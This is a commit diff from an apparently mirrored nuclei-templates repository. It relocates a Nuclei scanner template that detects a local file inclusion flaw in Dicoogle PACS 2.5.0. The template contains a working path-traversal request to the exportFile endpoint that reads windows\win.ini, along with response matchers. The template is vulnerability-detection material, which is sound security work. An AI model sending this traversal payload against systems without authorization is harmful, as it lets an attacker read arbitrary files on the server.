daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update and rename dicoogle-pacs-lfi.yaml to vulnerabilities/other/dicoogle-pacs-lfi.yaml

patch-1
Prince Chaddha 2021-12-24 19:23:04 +05:30 committed by GitHub
parent 439a1e966a
commit 0ddd4c7911
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
dicoogle-pacs-lfi.yaml → vulnerabilities/other/dicoogle-pacs-lfi.yaml
View File

@ -5,7 +5,9 @@ info:
author: 0x_akoko
severity: high
description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
reference: https://cxsecurity.com/issue/WLB-2018070131
reference:
- https://cxsecurity.com/issue/WLB-2018070131
- http://www.dicoogle.com/home
tags: windows,lfi,dicoogle
requests:
@ -13,12 +15,11 @@ requests:
path:
- "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body